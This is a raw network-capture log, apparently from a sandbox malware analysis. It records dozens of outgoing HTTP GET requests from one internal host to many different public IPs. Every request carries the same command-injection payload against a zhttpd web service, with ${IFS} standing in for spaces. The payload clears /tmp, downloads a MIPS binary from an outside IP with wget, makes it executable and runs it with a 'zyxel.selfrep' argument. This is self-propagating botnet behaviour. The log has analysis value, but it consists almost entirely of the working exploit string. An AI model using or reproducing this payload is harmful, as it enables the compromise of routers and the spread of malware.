                                                      Feb 2, 2024 06:36:02.843703032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6840192.168.2.1436156102.192.11.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843736887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6841192.168.2.145187632.10.53.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843771935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6842192.168.2.1455374186.30.1.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843813896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6843192.168.2.1436302125.0.219.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843868971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6844192.168.2.1451840186.189.77.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843900919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6845192.168.2.145761040.83.114.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843951941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6846192.168.2.145090071.235.52.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843981981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6847192.168.2.1441744150.209.139.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844028950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6848192.168.2.1454586131.184.99.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844083071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6849192.168.2.1450444198.60.114.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844109058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6850192.168.2.1459238179.154.141.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844162941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6851192.168.2.1451466110.56.236.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844196081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6852192.168.2.143772662.26.83.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844249964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6853192.168.2.145223441.59.133.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844290018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6854192.168.2.146024447.124.185.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844326019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6855192.168.2.1458968108.213.203.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844340086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6856192.168.2.143635665.23.65.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844398975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6857192.168.2.1457398118.118.213.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844439983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6858192.168.2.144388095.26.0.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844475031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6859192.168.2.145291631.99.8.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844532013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6860192.168.2.1442088150.198.114.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844569921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6861192.168.2.143662072.166.121.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844602108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6862192.168.2.1443400177.199.233.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844650030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6863192.168.2.145161635.231.175.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844706059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6864192.168.2.143392077.182.50.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844749928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6865192.168.2.1457342162.187.149.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844779968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6866192.168.2.1445936144.98.173.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844810009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6867192.168.2.1441158193.21.106.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844849110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6868192.168.2.1457220202.60.142.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844898939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6869192.168.2.143936695.58.9.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844932079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6870192.168.2.145914820.9.237.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.844959021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6871192.168.2.1438492158.10.44.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845002890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6872192.168.2.1438768173.213.192.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845058918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6873192.168.2.1441816144.184.226.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845098019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6874192.168.2.1438884128.121.98.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845150948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6875192.168.2.1453000223.200.142.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845186949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6876192.168.2.14563541.160.110.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845226049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6877192.168.2.1449318222.68.60.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845258951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6878192.168.2.143730261.230.196.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845298052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6879192.168.2.1440550219.206.168.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845325947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6880192.168.2.145321249.7.140.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845365047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6881192.168.2.1460920172.39.47.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845417023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6882192.168.2.1457394152.240.245.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845467091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6883192.168.2.1454404122.132.171.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845524073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6884192.168.2.1453844212.29.177.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845558882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6885192.168.2.144515842.89.31.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845618010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6886192.168.2.145665468.57.47.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845649004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6887192.168.2.144242867.76.63.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845690012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6888192.168.2.1454676198.91.129.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845717907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6889192.168.2.145631481.54.129.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845771074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6890192.168.2.143308420.89.123.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845804930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6891192.168.2.1443186194.112.226.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845845938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6892192.168.2.1447106155.202.218.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845880985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6893192.168.2.1455212107.81.220.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845932007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6894192.168.2.144353820.19.158.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.845977068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6895192.168.2.1460146202.61.7.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846014977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6896192.168.2.14374069.37.222.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846056938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6897192.168.2.1443938204.124.73.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846120119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6898192.168.2.1445366195.210.171.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846153975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6899192.168.2.1444374189.89.89.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846195936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6900192.168.2.1437114160.142.80.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846275091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6901192.168.2.1443740199.177.54.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.846276999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6902192.168.2.143538614.28.245.11443
                                                      TimestampBytes transferredDirectionData
